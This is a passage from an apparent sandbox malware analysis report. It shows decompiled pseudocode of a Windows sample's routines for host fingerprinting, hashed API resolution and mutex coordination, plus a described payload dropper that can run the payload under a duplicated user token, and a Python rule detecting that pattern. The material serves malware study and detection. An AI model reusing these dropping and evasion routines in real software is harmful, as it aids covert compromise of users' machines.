                      • GetProcessHeap.KERNEL32(00000000,?), ref: 0138A669
                      • HeapFree.KERNEL32(00000000), ref: 0138A670
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.633596595.0000000001381000.00000020.00020000.sdmp, Offset: 01380000, based on PE: true
                      • Associated: 00000000.00000002.633593986.0000000001380000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.633603767.000000000138B000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.633606489.000000000138C000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.633610317.000000000138D000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1380000_zeD11Fztx8.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$CloseHandle$Process$FileFree$Create_snwprintf$CountTickWrite$ActiveConsoleSessionmemset
                      • String ID: D
                      • API String ID: 65010116-2746444292
                      • Opcode ID: 2ca1df39a19431a35e395994c7911ae9b22da2d77f4245abe2f2cc59cd5d22c0
                      • Instruction ID: c7faa241a68115d6a8db546c9924d9f469c063f1e8fa97e3a52311cf96eb7a9b
                      • Opcode Fuzzy Hash: 2ca1df39a19431a35e395994c7911ae9b22da2d77f4245abe2f2cc59cd5d22c0
                      • Instruction Fuzzy Hash: 82813C75940309BFEB20ABA4DC89FEE7B7CFB08755F044151FA09E61C5DB70AA458BA0
                      Uniqueness

                      Uniqueness Score: -1.00%
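
                      E0138A3A0 drops a payload under the CSIDL 0x23 folder with a 4..19 character name and immediately starts it; its second branch starts it under a primary token duplicated from the interactive console session, so the child can run as the logged-on user while the dropper runs as a service account. The Python below is an added detection example, not part of the Joe Sandbox report or of the sample. It correlates constructed Sysmon-style FileCreate and ProcessCreate records (a simplified key=value format, not Sysmon's real schema) and flags a file written directly under C:\ProgramData with a 4..19 character name that the writing process then executes within a short window; a different account on the child than on the dropper is reported as the token-switch variant. Assumptions: CSIDL_COMMON_APPDATA resolves to C:\ProgramData (default install), the generated name uses ASCII letters and digits, and any short extension or none is accepted because the format string that joins folder and name is decrypted at runtime and does not appear on this page.

```python
import re
from datetime import datetime, timedelta

# Path pattern derived from the decompiled handler: a file directly under the
# CSIDL_COMMON_APPDATA folder (assumed to be C:\ProgramData) whose base name is
# 4..19 characters, i.e. (GetTickCount() & 0xf) + 4. The extension is not visible
# on this page, so any short extension, or none, is accepted. Charset is assumed.
DROP_PATH = re.compile(r"^c:\\programdata\\[a-z0-9]{4,19}(?:\.[a-z0-9]{1,4})?$", re.I)


def parse_event(line):
    """Parse one constructed 'key=value|key=value' record (not real Sysmon XML)."""
    fields = dict(kv.split("=", 1) for kv in line.strip().split("|"))
    fields["ts"] = datetime.fromisoformat(fields["ts"])
    return fields


def find_drop_and_run(lines, window=timedelta(seconds=30)):
    """Pair FileCreate (eid 11) records matching DROP_PATH with a ProcessCreate
    (eid 1) of the same image whose parent is the writer, within `window`.

    Returns a list of dicts {"drop": event, "exec": event, "token_switch": bool};
    token_switch is True when the child runs as a different account than the
    process that wrote the file (the WTSQueryUserToken branch of the handler).
    """
    events = sorted((parse_event(line) for line in lines if line.strip()),
                    key=lambda e: e["ts"])
    pending = {}   # lowercased path -> most recent matching FileCreate
    hits = []
    for ev in events:
        if ev["eid"] == "11" and DROP_PATH.match(ev["path"]):
            pending[ev["path"].lower()] = ev
        elif ev["eid"] == "1":
            drop = pending.get(ev["image"].lower())
            if drop is None:
                continue
            if ev["ppid"] == drop["pid"] and ev["ts"] - drop["ts"] <= window:
                hits.append({
                    "drop": drop,
                    "exec": ev,
                    "token_switch": ev["user"].lower() != drop["user"].lower(),
                })
    return hits


# Constructed sample records; PIDs, names, accounts and times are made up.
SAMPLE_LINES = [
    r"ts=2021-04-02T10:00:00|eid=11|pid=4321|user=NT AUTHORITY\SYSTEM|path=C:\ProgramData\kqzxm.exe",
    r"ts=2021-04-02T10:00:01|eid=1|pid=5100|ppid=4321|user=WS01\alice|image=C:\ProgramData\kqzxm.exe",
    r"ts=2021-04-02T10:00:05|eid=11|pid=2200|user=WS01\alice|path=C:\ProgramData\Microsoft\Windows\cache.dat",
    r"ts=2021-04-02T10:00:06|eid=1|pid=5101|ppid=2200|user=WS01\alice|image=C:\Windows\System32\notepad.exe",
    r"ts=2021-04-02T10:20:00|eid=1|pid=5102|ppid=4321|user=NT AUTHORITY\SYSTEM|image=C:\ProgramData\kqzxm.exe",
]

if __name__ == "__main__":
    for hit in find_drop_and_run(SAMPLE_LINES):
        print(hit["exec"]["image"], "pid", hit["exec"]["pid"],
              "token switch" if hit["token_switch"] else "same account")
```

                      The last constructed record is the same image started by the same parent twenty minutes later; it falls outside the 30 second window and is deliberately not paired, which keeps the rule tied to the drop-then-run sequence the handler performs rather than to any execution from C:\ProgramData.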

                      Control-flow Graph

                      Control-flow graph (legend: Executed / Not Executed; rendered as an image in the report, the edge list is not reproduced here). The basic blocks of E01389320 span 0x1389320-0x1389610; in block order the calls are GetModuleFileNameW, GetProcessHeap/RtlAllocateHeap, call 1381790, lstrlen, the word-selection loop, GetProcessHeap/HeapFree and call 1381830, then call 1381830 with _snwprintf/GetProcessHeap/HeapFree twice and CreateFileW, CreateFileMappingW, MapViewOfFile, GetFileSize/RtlComputeCrc32/UnmapViewOfFile, CloseHandle twice, GetComputerNameW, the name-sanitising loop, GetProcessHeap/RtlAllocateHeap, call 1381790, and _snprintf/GetProcessHeap/HeapFree.
                      C-Code - Quality: 64%
                      			E01389320(void* __ecx) {
                      				void* _v8;
                      				long _v12;
                      				short _v44;
                      				intOrPtr _t25;
                      				void* _t27;
                      				void* _t28;
                      				signed int _t32;
                      				char* _t35;
                      				int _t53;
                      				signed int _t60;
                      				void* _t71;
                      				long _t72;
                      				void* _t74;
                      				void* _t75;
                      				signed int _t76;
                      				char _t77;
                      				void* _t79;
                      				signed short* _t80;
                      				long _t87;
                      				void* _t92;
                      				void* _t94;
                      				short* _t96;
                      				void* _t97;
                      				void* _t98;
                      				void* _t99;
                      				void* _t101;
                      				void* _t102;
                      				void* _t103;
                      				void* _t104;
                      				void* _t106;
                      
                      				_t75 = __ecx;
                      				_t25 =  *0x138c27c; // 0x0 -> 32-bit host value copied to 0x138c3ac; it drives the name selection below and is appended to the identifier at the end. Its origin is not visible in this function
                      				_t103 = _t102 - 0x28;
                      				 *0x138c3ac = _t25;
                      				GetModuleFileNameW(0, 0x138c9c8, 0x104); // own image path, reopened below to compute its CRC-32
                      				_t27 =  *0x138c040(0, 0, 6); // first slot of the table filled by E01389C50; a non-zero result sets bit 0 of 0x138c2a4, which later selects CSIDL 0x29 (system directory) over CSIDL 0x1c
                      				if(_t27 != 0) {
                      					 *0x138c2a4 =  *0x138c2a4 | 0x00000001;
                      					 *0x138c0a8(_t27);
                      				}
                      				_t28 =  *0x138c3ac; // 0x0
                      				_t96 = 0x138c3b0;
                      				_v8 = _t28;
                      				_t92 = RtlAllocateHeap(GetProcessHeap(), 8, 0x15c);
                      				if(_t92 == 0) {
                      					_t92 = _v12;
                      				} else {
                      					_push(_t75);
                      					E01381790(0x13813d0, 0x158, _t92);
                      					_t103 = _t103 + 8;
                      				}
                      				_t76 =  *0x138c1e4(_t92, _t71);
                      				_t72 = 2;
                      				_v12 = _t76;
                      				do {
                      					_t32 = _v8;
                      					_v8 =  !(_t32 / _t76); // index value for the next round: the quotient, complemented (the decompiler prints the x86 not as '!')
                      					_t35 = _t92 + _t32 % _t76; // byte offset into the comma-separated word list (strlen in _t76)
                      					if(_t35 <= _t92) {
                      						L9:
                      						if( *_t35 != 0x2c) { // 0x2c = ','
                      							L11:
                      							_t77 =  *_t35;
                      							if(_t77 == 0) {
                      								goto L15;
                      							}
                      							while(_t77 != 0x2c) {
                      								_t35 = _t35 + 1;
                      								 *_t96 = _t77;
                      								_t96 = _t96 + 2;
                      								_t77 =  *_t35;
                      								if(_t77 != 0) {
                      									continue;
                      								}
                      								goto L15;
                      							}
                      							goto L15;
                      						}
                      						L10:
                      						_t35 = _t35 + 1;
                      						goto L11;
                      					}
                      					while( *_t35 != 0x2c) {
                      						_t35 = _t35 - 1;
                      						if(_t35 > _t92) {
                      							continue;
                      						}
                      						goto L9;
                      					}
                      					goto L10;
                      					L15:
                      					_t76 = _v12;
                      					_t72 = _t72 - 1;
                      				} while (_t72 != 0);
                      				HeapFree(GetProcessHeap(), 0, _t92);
                      				 *_t96 = 0;
                      				E01381830(0x1381384, 0xc, 0x7d1cc189,  &_v12);
                      				_t104 = _t103 + 8;
                      				_push(0x138c5b8);
                      				_push(0);
                      				_push(0);
                      				if(( *0x138c2a4 & 0x00000001) == 0) {
                      					 *0x138c214(0, 0x1c); // 0x1c = CSIDL_LOCAL_APPDATA (remaining arguments pushed above)
                      					_t87 = 0x14;
                      					_t79 = 0x1381530;
                      				} else {
                      					 *0x138c214(0, 0x29); // 0x29 = CSIDL_SYSTEMX86, taken when the call at function entry succeeded
                      					_t87 = 4;
                      					_t79 = 0x1381380;
                      				}
                      				E01381830(_t79, _t87, 0x7d1cc189,  &_v8);
                      				_t97 = _v8;
                      				 *0x138c200(0x138c5b8, 0x104, _t97, 0x138c5b8, 0x138c3b0);
                      				HeapFree(GetProcessHeap(), 0, _t97);
                      				_t98 = _v12;
                      				 *0x138c200(0x138c7c0, 0x104, _t98, 0x138c5b8, 0x138c3b0);
                      				_t106 = _t104 + 0x30;
                      				HeapFree(GetProcessHeap(), 0, _t98);
                      				_t99 = CreateFileW(0x138c9c8, 0x80000000, 1, 0, 3, 0, 0); // opens the own image: GENERIC_READ, FILE_SHARE_READ, OPEN_EXISTING
                      				if(_t99 != 0xffffffff) {
                      					_t94 = CreateFileMappingW(_t99, 0, 2, 0, 0, 0); // PAGE_READONLY
                      					if(_t94 != 0) {
                      						_t74 = MapViewOfFile(_t94, 4, 0, 0, 0); // FILE_MAP_READ
                      						if(_t74 != 0) {
                      							 *0x138cbd0 = RtlComputeCrc32(0, _t74, GetFileSize(_t99, 0)); // CRC-32 of the whole file on disk, initial value 0
                      							UnmapViewOfFile(_t74);
                      						}
                      						CloseHandle(_t94);
                      					}
                      					CloseHandle(_t99);
                      				}
                      				_v12 = 0x10; // 16 wide chars: names longer than 15 characters make GetComputerNameW fail and the function return early
                      				_t53 = GetComputerNameW( &_v44,  &_v12);
                      				if(_t53 == 0) {
                      					L40:
                      					return _t53;
                      				} else {
                      					_t80 =  &_v44;
                      					if(_v44 == 0) {
                      						L36:
                      						_t101 = RtlAllocateHeap(GetProcessHeap(), 8, 0xc);
                      						if(_t101 == 0) {
                      							_t101 = _v12;
                      						} else {
                      							_push(_t80);
                      							E01381790(0x1381390, 8, _t101);
                      							_t106 = _t106 + 8;
                      						}
                      						 *0x138c210(0x138c2a8, 0x104, _t101,  &_v44,  *0x138c3ac); // _snprintf (see APIs, 013895F2): sanitised computer name plus the 32-bit value from 0x138c27c, formatted with the decrypted 8-byte string in _t101
                      						_t53 = HeapFree(GetProcessHeap(), 0, _t101);
                      						goto L40;
                      					}
                      					do {
                      						_t60 =  *_t80 & 0x0000ffff;
                      						if(_t60 < 0x30 || _t60 > 0x39) { // not '0'..'9'
                      							if(_t60 < 0x61 || _t60 > 0x7a) { // not 'a'..'z'
                      								if(_t60 < 0x41 || _t60 > 0x5a) { // not 'A'..'Z'
                      									 *_t80 = 0x58; // 'X'
                      								}
                      							}
                      						}
                      						_t80 =  &(_t80[1]);
                      					} while ( *_t80 != 0);
                      					goto L36;
                      				}
                      			}

                      APIs
                      • GetModuleFileNameW.KERNEL32(00000000,0138C9C8,00000104,?,?,?,?,?,?,?,?,?,01389310), ref: 0138933C
                      • GetProcessHeap.KERNEL32(00000008,0000015C,00000000,013816C0,?,?,?,?,?,?,?,?,?,01389310), ref: 01389376
                      • RtlAllocateHeap.NTDLL(00000000), ref: 0138937D
                      • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,01389310), ref: 013893A4
                      • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,01389310), ref: 013893FF
                      • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,01389310), ref: 01389406
                      • _snwprintf.NTDLL ref: 0138948E
                      • GetProcessHeap.KERNEL32(00000000,01389310), ref: 0138949A
                      • HeapFree.KERNEL32(00000000), ref: 013894A1
                      • _snwprintf.NTDLL ref: 013894BF
                      • GetProcessHeap.KERNEL32(00000000,?), ref: 013894CB
                      • HeapFree.KERNEL32(00000000), ref: 013894D2
                      • CreateFileW.KERNEL32(0138C9C8,80000000,00000001,00000000,00000003,00000000,00000000), ref: 013894EC
                      • CreateFileMappingW.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000000), ref: 01389504
                      • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 01389519
                      • GetFileSize.KERNEL32(00000000,00000000), ref: 01389528
                      • RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 01389532
                      • UnmapViewOfFile.KERNEL32(00000000), ref: 0138953E
                      • CloseHandle.KERNEL32(00000000), ref: 01389545
                      • CloseHandle.KERNEL32(00000000), ref: 0138954C
                      • GetComputerNameW.KERNEL32(?,?), ref: 01389561
                      • GetProcessHeap.KERNEL32(00000008,0000000C), ref: 013895B1
                      • RtlAllocateHeap.NTDLL(00000000), ref: 013895B8
                      • _snprintf.NTDLL ref: 013895F2
                      • GetProcessHeap.KERNEL32(00000000,00000010), ref: 013895FE
                      • HeapFree.KERNEL32(00000000), ref: 01389605
                      Memory Dump Source
                      • Source File: 00000000.00000002.633596595.0000000001381000.00000020.00020000.sdmp, Offset: 01380000, based on PE: true
                      • Associated: 00000000.00000002.633593986.0000000001380000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.633603767.000000000138B000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.633606489.000000000138C000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.633610317.000000000138D000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1380000_zeD11Fztx8.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$FileProcess$Free$AllocateCloseCreateHandleNameView_snwprintf$ComputeComputerCrc32MappingModuleSizeUnmap_snprintflstrlen
                      • String ID:
                      • API String ID: 968319538-0
                      • Opcode ID: 94b3d4a7519a7cd726e34cb1e52bbb59deeea15c8edb704930b8aff32887cf65
                      • Instruction ID: 4ddc59f0e7edc307da02b9f6f769eace4e23243f5ae91a23760071be74b7ae94
                      • Opcode Fuzzy Hash: 94b3d4a7519a7cd726e34cb1e52bbb59deeea15c8edb704930b8aff32887cf65
                      • Instruction Fuzzy Hash: B981A071640304BFFB206BA9AC89FEE3B6CEB85B1DF242015F605EA2C4D7B489418775
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      C-Code - Quality: 96%
                      			E01389C50(void* __ecx) {
                      				void* _v8;
                      				void* _t100;
                      				void* _t101;
                      				void* _t102;
                      				void* _t103;
                      				void* _t104;
                      				void* _t105;
                      				void* _t106;
                      				void* _t107;
                      
                      0x01389c53				_push(__ecx);
                      0x01389c68				E01381830(0x138155c, 0xc, 0x4a604ebc,  &_v8);
                      0x01389c6d				_t100 = _v8;
                      0x01389c8d				E01381B10(LoadLibraryW(_t100), 0x1381040, 0x21, 0x54b7e774, 0x138c040);
                      0x01389c9f				HeapFree(GetProcessHeap(), 0, _t100);
                      0x01389cb8				E01381830(0x1381568, 0xc, 0x4a604ebc,  &_v8);
                      0x01389cbd				_t101 = _v8;
                      0x01389cdd				E01381B10(LoadLibraryW(_t101), 0x1381024, 1, 0x3c505b91, 0x138c0c8);
                      0x01389cef				HeapFree(GetProcessHeap(), 0, _t101);
                      0x01389d08				E01381830(0x1381574, 0xc, 0x4a604ebc,  &_v8);
                      0x01389d0d				_t102 = _v8;
                      0x01389d2d				E01381B10(LoadLibraryW(_t102), 0x1381028, 2, 0x10577008, 0x138c214);
                      0x01389d3f				HeapFree(GetProcessHeap(), 0, _t102);
                      0x01389d58				E01381830(0x1381580, 0xc, 0x4a604ebc,  &_v8);
                      0x01389d5d				_t103 = _v8;
                      0x01389d7d				E01381B10(LoadLibraryW(_t103), 0x138100c, 1, 0x7194b56b, 0x138c0c4);
                      0x01389d8f				HeapFree(GetProcessHeap(), 0, _t103);
                      0x01389da8				E01381830(0x1381550, 0xc, 0x4a604ebc,  &_v8);
                      0x01389dad				_t104 = _v8;
                      0x01389dcd				E01381B10(LoadLibraryW(_t104), 0x13810c4, 1, 0x20edec96, 0x138c0cc);
                      0x01389ddf				HeapFree(GetProcessHeap(), 0, _t104);
                      0x01389df8				E01381830(0x1381544, 0xc, 0x4a604ebc,  &_v8);
                      0x01389dfd				_t105 = _v8;
                      0x01389e1d				E01381B10(LoadLibraryW(_t105), 0x13810c8, 2, 0x620cb38e, 0x138c21c);
                      0x01389e2f				HeapFree(GetProcessHeap(), 0, _t105);
                      0x01389e48				E01381830(0x1381598, 0xc, 0x4a604ebc,  &_v8);
                      0x01389e4d				_t106 = _v8;
                      0x01389e6d				E01381B10(LoadLibraryW(_t106), 0x1381220, 0xe, 0x5a7185ae, 0x138c230);
                      0x01389e7f				HeapFree(GetProcessHeap(), 0, _t106);
                      0x01389e98				E01381830(0x138158c, 0xc, 0x4a604ebc,  &_v8);
                      0x01389ea0				_t107 = _v8;
                      0x01389ebd				E01381B10(LoadLibraryW(_t107), 0x1381214, 3, 0x73ee0ad8, 0x138c224);
                      0x01389ecf				HeapFree(GetProcessHeap(), 0, _t107);
                      0x01389ede				return E013892A0(_t61);
                      			}

                      APIs
                        • Part of subcall function 01381830: GetProcessHeap.KERNEL32(00000008,01389F6B,00000000,00000000,01381004,?,013815F4,4DBAC13F,01389F6B,?,00000000), ref: 01381844
                        • Part of subcall function 01381830: RtlAllocateHeap.NTDLL(00000000,?,013815F4), ref: 0138184B
                      • LoadLibraryW.KERNEL32(013816C0,?,013816C0), ref: 01389C74
                      • GetProcessHeap.KERNEL32(00000000,013816C0,?,?,?,?,013816C0), ref: 01389C98
                      • HeapFree.KERNEL32(00000000,?,?,?,?,013816C0), ref: 01389C9F
                      • LoadLibraryW.KERNEL32(013816C0,?,?,?,?,?,?,013816C0), ref: 01389CC4
                      • GetProcessHeap.KERNEL32(00000000,013816C0,?,?,?,?,?,?,?,?,?,013816C0), ref: 01389CE8
                      • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,013816C0), ref: 01389CEF
                      • LoadLibraryW.KERNEL32(013816C0,?,?,?,?,?,?,?,?,?,?,?,013816C0), ref: 01389D14
                      • GetProcessHeap.KERNEL32(00000000,013816C0), ref: 01389D38
                      • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,013816C0), ref: 01389D3F
                      • LoadLibraryW.KERNEL32(013816C0), ref: 01389D64
                      • GetProcessHeap.KERNEL32(00000000,013816C0), ref: 01389D88
                      • HeapFree.KERNEL32(00000000), ref: 01389D8F
                      • LoadLibraryW.KERNEL32(013816C0), ref: 01389DB4
                      • GetProcessHeap.KERNEL32(00000000,013816C0), ref: 01389DD8
                      • HeapFree.KERNEL32(00000000), ref: 01389DDF
                      • LoadLibraryW.KERNEL32(013816C0), ref: 01389E04
                      • GetProcessHeap.KERNEL32(00000000,013816C0), ref: 01389E28
                      • HeapFree.KERNEL32(00000000), ref: 01389E2F
                      • LoadLibraryW.KERNEL32(013816C0), ref: 01389E54
                      • GetProcessHeap.KERNEL32(00000000,013816C0), ref: 01389E78
                      • HeapFree.KERNEL32(00000000), ref: 01389E7F
                      • LoadLibraryW.KERNEL32(013816C0), ref: 01389EA4
                      • GetProcessHeap.KERNEL32(00000000,013816C0), ref: 01389EC8
                      • HeapFree.KERNEL32(00000000), ref: 01389ECF
                        • Part of subcall function 013892A0: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 013892B5
                      Memory Dump Source
                      • Source File: 00000000.00000002.633596595.0000000001381000.00000020.00020000.sdmp, Offset: 01380000, based on PE: true
                      • Associated: 00000000.00000002.633593986.0000000001380000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.633603767.000000000138B000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.633606489.000000000138C000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.633610317.000000000138D000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1380000_zeD11Fztx8.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$Process$FreeLibraryLoad$AllocateDirectoryWindows
                      • String ID:
                      • API String ID: 357832750-0
                      • Opcode ID: e51e36d1ec1f80e34130864f71d6db9c1b3b6c569e85710e5c42d616f42d4709
                      • Instruction ID: 4ff2710d872ebe2a71269100d296f505bad973408c5c583e793d95d56a2ea3a4
                      • Opcode Fuzzy Hash: e51e36d1ec1f80e34130864f71d6db9c1b3b6c569e85710e5c42d616f42d4709
                      • Instruction Fuzzy Hash: E551B275A40304BFEE2077E4AC5AFDF3A6CEB9130AF140014F906A7289DA315E068BB5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      C-Code - Quality: 48%
                      			E01389060(void* __eflags) {
                      				void* _v8;
                      				char _v12;
                      				short _v140;
                      				short _v268;
                      				short _v396;
                      				long _t31;
                      				void* _t45;
                      				void* _t47;
                      				long _t50;
                      				long _t57;
                      				int _t59;
                      				signed int _t60;
                      				void* _t66;
                      				void* _t67;
                      				void* _t68;
                      				void* _t69;
                      
                      0x0138906e				_t59 = 0;
                      0x01389076				memset(0x138c284, 0, 0x18);
                      0x0138907f				_t60 = 0x1381364;
                      0x0138908a				_t2 = _t59 + 0xc; // 0xc
                      0x0138908d				E01381830(0x1381364, _t2, 0x4a604ebc,  &_v8);
                      0x01389098				_t67 = _v8;
                      0x013890a5				 *0x138c200( &_v140, 0x40, _t67,  *0x138c27c);
                      0x013890b7				HeapFree(GetProcessHeap(), 0, _t67);
                      0x013890cc				_t66 = CreateMutexW(0, 0,  &_v140);
                      0x013890d0				if(_t66 == 0) {
                      0x0138924f					L12:
                      0x01389255					 *0x138c0b8( *0x138c288);
                      0x01389261					 *0x138c064( *0x138c28c);
                      0x0138926d					 *0x138c064( *0x138c290);
                      0x0138927b					 *0x138c08c( *0x138c284, 0);
                      0x01389281					E01388AA0();
                      0x01389294					return E0138A750(_t60 | 0xffffffff);
                      0x01389294				}
                      0x013890d8				_t31 = WaitForSingleObject(_t66, 0);
                      0x013890e0				if(_t31 == 0 || _t31 == 0x80) {
                      0x01389100					E01381830(0x1381258, 0xc, 0x4a604ebc,  &_v8);
                      0x0138910b					_t68 = _v8;
                      0x01389118					 *0x138c200( &_v396, 0x40, _t68,  *0x138c27c);
                      0x0138912b					HeapFree(GetProcessHeap(), 0, _t68);
                      0x0138913f					_t60 = 0x1381264;
                      0x01389144					E01381830(0x1381264, 0xc, 0x4a604ebc,  &_v8);
                      0x0138914f					_t69 = _v8;
                      0x0138915c					 *0x138c200( &_v268, 0x40, _t69,  *0x138c27c);
                      0x0138916f					HeapFree(GetProcessHeap(), 0, _t69);
                      0x01389180					_t45 = CreateMutexW(0, 0,  &_v268);
                      0x01389186					 *0x138c2a0 = _t45;
                      0x0138918d					if(_t45 == 0) {
                      0x00000000						goto L12;
                      0x00000000					}
                      0x013891a0					_t47 = CreateEventW(0, 0, 0,  &_v396);
                      0x013891a6					 *0x138c29c = _t47;
                      0x013891ad					if(_t47 != 0) {
                      0x013891ba						_t57 = SignalObjectAndWait(_t47,  *0x138c2a0, 0xffffffff, 0);
                      0x013891c2						if(_t57 == 0 || _t57 == 0x80) {
                      0x013891d7							_t59 = ResetEvent( *0x138c29c);
                      0x013891d7						}
                      0x013891c2					}
                      0x013891da					ReleaseMutex(_t66);
                      0x013891e1					CloseHandle(_t66);
                      0x013891e9					if(_t59 != 0) {
                      0x013891eb						_t50 = GetTickCount();
                      0x013891f1						_push(0x10);
                      0x013891f3						_push(0x3e8);
                      0x013891f8						_push(0x3e8);
                      0x013891fd						_push(0);
                      0x01389204						 *0x138c280 = 1;
                      0x0138920e						_push(E01388DD0);
                      0x01389213						 *0x138c278 = _t50 + 0x3e8;
                      0x0138921b						_push(0);
                      0x0138921d						_push( &_v12);
                      0x01389226						if( *0x138c0ec() != 0) {
                      0x01389230							WaitForSingleObject( *0x138c29c, 0xffffffff);
                      0x0138923d							 *0x138c138(0, _v12, 0xffffffff);
                      0x0138923d						}
                      0x01389249						CloseHandle( *0x138c29c);
                      0x01389249					}
                      0x013891e9				}
                      			}

                      APIs
                      • memset.NTDLL ref: 01389076
                        • Part of subcall function 01381830: GetProcessHeap.KERNEL32(00000008,01389F6B,00000000,00000000,01381004,?,013815F4,4DBAC13F,01389F6B,?,00000000), ref: 01381844
                        • Part of subcall function 01381830: RtlAllocateHeap.NTDLL(00000000,?,013815F4), ref: 0138184B
                      • _snwprintf.NTDLL ref: 013890A5
                      • GetProcessHeap.KERNEL32(00000000,01389315), ref: 013890B0
                      • HeapFree.KERNEL32(00000000), ref: 013890B7
                      • CreateMutexW.KERNEL32(00000000,00000000,?), ref: 013890C6
                      • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 013890D8
                      • _snwprintf.NTDLL ref: 01389118
                      • GetProcessHeap.KERNEL32(00000000,01389315), ref: 01389124
                      • HeapFree.KERNEL32(00000000), ref: 0138912B
                      • _snwprintf.NTDLL ref: 0138915C
                      • GetProcessHeap.KERNEL32(00000000,01389315), ref: 01389168
                      • HeapFree.KERNEL32(00000000), ref: 0138916F
                      • CreateMutexW.KERNEL32(00000000,00000000,?), ref: 01389180
                      • CreateEventW.KERNEL32(00000000,00000000,00000000,?), ref: 013891A0
                      • SignalObjectAndWait.KERNEL32(00000000,000000FF,00000000), ref: 013891BA
                      • ResetEvent.KERNEL32 ref: 013891D1
                      • ReleaseMutex.KERNEL32(00000000), ref: 013891DA
                      • CloseHandle.KERNEL32(00000000), ref: 013891E1
                      • GetTickCount.KERNEL32 ref: 013891EB
                      • CreateTimerQueueTimer.KERNEL32(?,00000000,01388DD0,00000000,000003E8,000003E8,00000010), ref: 0138921E
                      • WaitForSingleObject.KERNEL32(000000FF), ref: 01389230
                      • DeleteTimerQueueTimer.KERNEL32(00000000,?,000000FF), ref: 0138923D
                      • CloseHandle.KERNEL32 ref: 01389249
                      Memory Dump Source
                      • Source File: 00000000.00000002.633596595.0000000001381000.00000020.00020000.sdmp, Offset: 01380000, based on PE: true
                      • Associated: 00000000.00000002.633593986.0000000001380000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.633603767.000000000138B000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.633606489.000000000138C000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.633610317.000000000138D000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1380000_zeD11Fztx8.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$CreateProcessTimer$FreeMutexObjectWait_snwprintf$CloseEventHandleQueueSingle$AllocateCountDeleteReleaseResetSignalTickmemset
                      • String ID:
                      • API String ID: 3199319163-0
                      • Opcode ID: 80f5351f5166917a96e2cf62d3da4db2f00c0eba9bd67252807e04c2dc5734e4
                      • Instruction ID: f1a8b679c1f82030e265d0bd0f94bf99039e1ce1a092dc448a9ed22d0dbfc090
                      • Opcode Fuzzy Hash: 80f5351f5166917a96e2cf62d3da4db2f00c0eba9bd67252807e04c2dc5734e4
                      • Instruction Fuzzy Hash: AA513671500309AFEF206BE4EC89FEE7B6CEB45719F106165FA09E21D8DB709A448B70
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 205 1389620-138963e lstrcmpiW 206 1389640-1389646 205->206 207 1389647-138969e call 13818d0 memset * 2 205->207 211 13896a9-13896f0 GetTempPathW GetTempFileNameW 207->211 212 13896a0-13896a3 207->212 216 1389994-138999f 211->216 217 13896f6-13896f9 211->217 212->211 213 138972b-1389737 call 1381970 212->213 220 138973d-1389750 213->220 221 1389935-1389980 memset CreateProcessW 213->221 217->216 219 13896ff-138971c 217->219 219->216 225 1389722-1389725 219->225 220->216 226 1389756-1389785 220->226 221->216 222 1389982-138998e CloseHandle * 2 221->222 222->216 225->213 225->216 228 138979c-13897c2 226->228 229 1389787-1389797 226->229 232 1389907-1389909 228->232 233 13897c8-13897d3 GetLastError 228->233 229->232 234 138990b-1389916 232->234 235 138991d-138992f 232->235 233->232 236 13897d9-13897f2 GetProcessHeap RtlAllocateHeap 233->236 234->235 236->232 237 13897f8-1389817 236->237 241 138981d-138983d 237->241 242 1389930-1389933 237->242 244 1389840-1389842 241->244 243 13898d5-13898eb GetProcessHeap HeapFree 242->243 243->232 247 13898ed-1389901 GetProcessHeap HeapFree 243->247 245 1389848-1389857 244->245 246 13898d2 244->246 250 1389859-138986c 245->250 251 13898bf-13898cc 245->251 246->243 247->232 253 13898b8 250->253 254 138986e-1389877 GetLastError 250->254 251->244 251->246 253->251 254->253 255 1389879-138988f GetProcessHeap RtlAllocateHeap 254->255 255->253 256 1389891-13898a7 255->256 256->253 258 13898a9-13898b2 GetProcessHeap HeapFree 256->258 258->253
                      C-Code - Quality: 20%
                      			E01389620(void* __ecx, void* __edx) {
                      				long _v8;
                      				long _v12;
                      				void* _v16;
                      				long _v20;
                      				intOrPtr _v24;
                      				intOrPtr _v28;
                      				signed int _v32;
                      				long _v46;
                      				struct _PROCESS_INFORMATION _v52;
                      				WCHAR* _v56;
                      				intOrPtr _v60;
                      				void _v64;
                      				void* _v68;
                      				struct _STARTUPINFOW _v140;
                      				short _v660;
                      				int _t56;
                      				void* _t64;
                      				long _t71;
                      				void* _t74;
